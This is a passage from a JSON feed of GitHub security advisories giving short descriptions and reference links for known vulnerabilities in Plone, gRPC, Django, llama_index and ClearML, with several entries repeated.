href=\"https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484\">https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-jcwh-rj6j-vm75\">https://github.com/advisories/GHSA-jcwh-rj6j-vm75</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75",
            "title": "[plone] Plone allows remote users to modify arbitrary portraits",
            "date_modified": "2024-02-12T16:10:44.000Z",
            "date_published": "2022-05-01T06:52:02.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Plone 2.0.5, 2.1.2, and 2.5-beta1 does not restrict access to the (1) changeMemberPortrait, (2) deletePersonalPortrait, and (3) testCurrentPassword methods, which allows remote attackers to modify portraits.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2006-1711\">https://nvd.nist.gov/vuln/detail/CVE-2006-1711</a></li>\n<li><a href=\"https://exchange.xforce.ibmcloud.com/vulnerabilities/25781\">https://exchange.xforce.ibmcloud.com/vulnerabilities/25781</a></li>\n<li><a href=\"http://www.debian.org/security/2006/dsa-1032\">http://www.debian.org/security/2006/dsa-1032</a></li>\n<li><a href=\"https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432\">https://web.archive.org/web/20060412111111/https://dev.plone.org/plone/ticket/5432</a></li>\n<li><a href=\"https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484\">https://web.archive.org/web/20060422195724/http://www.securityfocus.com/bid/17484</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-jcwh-rj6j-vm75\">https://github.com/advisories/GHSA-jcwh-rj6j-vm75</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75",
            "title": "[plone] Plone allows remote users to modify arbitrary portraits",
            "date_modified": "2024-02-12T16:10:44.000Z",
            "date_published": "2022-05-01T06:52:02.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-jcwh-rj6j-vm75"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.&nbsp;</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-4785\">https://nvd.nist.gov/vuln/detail/CVE-2023-4785</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33656\">https://github.com/grpc/grpc/pull/33656</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33667\">https://github.com/grpc/grpc/pull/33667</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33669\">https://github.com/grpc/grpc/pull/33669</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33670\">https://github.com/grpc/grpc/pull/33670</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33672\">https://github.com/grpc/grpc/pull/33672</a></li>\n<li><a href=\"https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U\">https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.53.2\">https://rubygems.org/gems/grpc/versions/1.53.2</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.54.3\">https://rubygems.org/gems/grpc/versions/1.54.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.55.3\">https://rubygems.org/gems/grpc/versions/1.55.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.56.2\">https://rubygems.org/gems/grpc/versions/1.56.2</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-p25m-jpj4-qcrr\">https://github.com/advisories/GHSA-p25m-jpj4-qcrr</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr",
            "title": "[grpcio] Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)",
            "date_modified": "2024-02-11T05:08:25.000Z",
            "date_published": "2023-09-13T18:31:26.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.&nbsp;</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-4785\">https://nvd.nist.gov/vuln/detail/CVE-2023-4785</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33656\">https://github.com/grpc/grpc/pull/33656</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33667\">https://github.com/grpc/grpc/pull/33667</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33669\">https://github.com/grpc/grpc/pull/33669</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33670\">https://github.com/grpc/grpc/pull/33670</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33672\">https://github.com/grpc/grpc/pull/33672</a></li>\n<li><a href=\"https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U\">https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.53.2\">https://rubygems.org/gems/grpc/versions/1.53.2</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.54.3\">https://rubygems.org/gems/grpc/versions/1.54.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.55.3\">https://rubygems.org/gems/grpc/versions/1.55.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.56.2\">https://rubygems.org/gems/grpc/versions/1.56.2</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-p25m-jpj4-qcrr\">https://github.com/advisories/GHSA-p25m-jpj4-qcrr</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr",
            "title": "[grpcio] Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)",
            "date_modified": "2024-02-11T05:08:25.000Z",
            "date_published": "2023-09-13T18:31:26.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.&nbsp;</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-4785\">https://nvd.nist.gov/vuln/detail/CVE-2023-4785</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33656\">https://github.com/grpc/grpc/pull/33656</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33667\">https://github.com/grpc/grpc/pull/33667</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33669\">https://github.com/grpc/grpc/pull/33669</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33670\">https://github.com/grpc/grpc/pull/33670</a></li>\n<li><a href=\"https://github.com/grpc/grpc/pull/33672\">https://github.com/grpc/grpc/pull/33672</a></li>\n<li><a href=\"https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U\">https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.53.2\">https://rubygems.org/gems/grpc/versions/1.53.2</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.54.3\">https://rubygems.org/gems/grpc/versions/1.54.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.55.3\">https://rubygems.org/gems/grpc/versions/1.55.3</a></li>\n<li><a href=\"https://rubygems.org/gems/grpc/versions/1.56.2\">https://rubygems.org/gems/grpc/versions/1.56.2</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-p25m-jpj4-qcrr\">https://github.com/advisories/GHSA-p25m-jpj4-qcrr</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr",
            "title": "[grpcio] Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)",
            "date_modified": "2024-02-11T05:08:25.000Z",
            "date_published": "2023-09-13T18:31:26.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-p25m-jpj4-qcrr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The <code>{% debug %}</code> template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-22818\">https://nvd.nist.gov/vuln/detail/CVE-2022-22818</a></li>\n<li><a href=\"https://docs.djangoproject.com/en/4.0/releases/security/\">https://docs.djangoproject.com/en/4.0/releases/security/</a></li>\n<li><a href=\"https://groups.google.com/forum/#!forum/django-announce\">https://groups.google.com/forum/#!forum/django-announce</a></li>\n<li><a href=\"https://www.djangoproject.com/weblog/2022/feb/01/security-releases/\">https://www.djangoproject.com/weblog/2022/feb/01/security-releases/</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/</a></li>\n<li><a href=\"https://security.netapp.com/advisory/ntap-20220221-0003/\">https://security.netapp.com/advisory/ntap-20220221-0003/</a></li>\n<li><a href=\"https://www.debian.org/security/2022/dsa-5254\">https://www.debian.org/security/2022/dsa-5254</a></li>\n<li><a href=\"https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5\">https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5</a></li>\n<li><a href=\"https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2\">https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2</a></li>\n<li><a href=\"https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6\">https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-95rw-fx8r-36v6\">https://github.com/advisories/GHSA-95rw-fx8r-36v6</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6",
            "title": "[django] Cross-site Scripting in Django",
            "date_modified": "2024-02-09T23:53:28.000Z",
            "date_published": "2022-02-04T00:00:33.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The <code>{% debug %}</code> template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-22818\">https://nvd.nist.gov/vuln/detail/CVE-2022-22818</a></li>\n<li><a href=\"https://docs.djangoproject.com/en/4.0/releases/security/\">https://docs.djangoproject.com/en/4.0/releases/security/</a></li>\n<li><a href=\"https://groups.google.com/forum/#!forum/django-announce\">https://groups.google.com/forum/#!forum/django-announce</a></li>\n<li><a href=\"https://www.djangoproject.com/weblog/2022/feb/01/security-releases/\">https://www.djangoproject.com/weblog/2022/feb/01/security-releases/</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/</a></li>\n<li><a href=\"https://security.netapp.com/advisory/ntap-20220221-0003/\">https://security.netapp.com/advisory/ntap-20220221-0003/</a></li>\n<li><a href=\"https://www.debian.org/security/2022/dsa-5254\">https://www.debian.org/security/2022/dsa-5254</a></li>\n<li><a href=\"https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5\">https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5</a></li>\n<li><a href=\"https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2\">https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2</a></li>\n<li><a href=\"https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6\">https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-95rw-fx8r-36v6\">https://github.com/advisories/GHSA-95rw-fx8r-36v6</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6",
            "title": "[django] Cross-site Scripting in Django",
            "date_modified": "2024-02-09T23:53:28.000Z",
            "date_published": "2022-02-04T00:00:33.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The <code>{% debug %}</code> template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-22818\">https://nvd.nist.gov/vuln/detail/CVE-2022-22818</a></li>\n<li><a href=\"https://docs.djangoproject.com/en/4.0/releases/security/\">https://docs.djangoproject.com/en/4.0/releases/security/</a></li>\n<li><a href=\"https://groups.google.com/forum/#!forum/django-announce\">https://groups.google.com/forum/#!forum/django-announce</a></li>\n<li><a href=\"https://www.djangoproject.com/weblog/2022/feb/01/security-releases/\">https://www.djangoproject.com/weblog/2022/feb/01/security-releases/</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/</a></li>\n<li><a href=\"https://security.netapp.com/advisory/ntap-20220221-0003/\">https://security.netapp.com/advisory/ntap-20220221-0003/</a></li>\n<li><a href=\"https://www.debian.org/security/2022/dsa-5254\">https://www.debian.org/security/2022/dsa-5254</a></li>\n<li><a href=\"https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5\">https://github.com/django/django/commit/01422046065d2b51f8f613409cad2c81b39487e5</a></li>\n<li><a href=\"https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2\">https://github.com/django/django/commit/1a1e8278c46418bde24c86a65443b0674bae65e2</a></li>\n<li><a href=\"https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6\">https://github.com/django/django/commit/c27a7eb9f40b64990398978152e62b6ff839c2e6</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-95rw-fx8r-36v6\">https://github.com/advisories/GHSA-95rw-fx8r-36v6</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6",
            "title": "[django] Cross-site Scripting in Django",
            "date_modified": "2024-02-09T23:53:28.000Z",
            "date_published": "2022-02-04T00:00:33.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-95rw-fx8r-36v6"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>An issue in llama_index v.0.7.13 and before allows a remote attacker to execute arbitrary code via the <code>exec</code> parameter in PandasQueryEngine function.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-39662\">https://nvd.nist.gov/vuln/detail/CVE-2023-39662</a></li>\n<li><a href=\"https://github.com/jerryjliu/llama_index/issues/7054\">https://github.com/jerryjliu/llama_index/issues/7054</a></li>\n<li><a href=\"https://github.com/run-llama/llama_index/commit/9f3e50a803f519af9ab62e63d413441c43001d81\">https://github.com/run-llama/llama_index/commit/9f3e50a803f519af9ab62e63d413441c43001d81</a></li>\n<li><a href=\"https://github.com/run-llama/llama_index/commit/aa6726706476e0f957a8d57a5ca89e519e93bad7\">https://github.com/run-llama/llama_index/commit/aa6726706476e0f957a8d57a5ca89e519e93bad7</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-2xxc-73fv-36f7\">https://github.com/advisories/GHSA-2xxc-73fv-36f7</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-2xxc-73fv-36f7",
            "title": "[llama-index] llama-index vulnerable to arbitrary code execution",
            "date_modified": "2024-02-09T23:47:17.000Z",
            "date_published": "2023-08-15T18:31:32.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-2xxc-73fv-36f7"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Allegro AI’s open-source version of ClearML stores passwords in plaintext within the MongoDB instance, resulting in a compromised server leaking all user emails and passwords.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-24595\">https://nvd.nist.gov/vuln/detail/CVE-2024-24595</a></li>\n<li><a href=\"https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain\">https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gvqv-h7hh-6fcc\">https://github.com/advisories/GHSA-gvqv-h7hh-6fcc</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gvqv-h7hh-6fcc",
            "title": "[clearml] Allegro AI ClearML Stores Credentials in Plaintext in MongoDB Instance",
            "date_modified": "2024-02-13T19:29:44.000Z",
            "date_published": "2024-02-06T00:30:28.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gvqv-h7hh-6fcc"
            },
            "tags": [
                "severity"
            ]
        }
    ]
}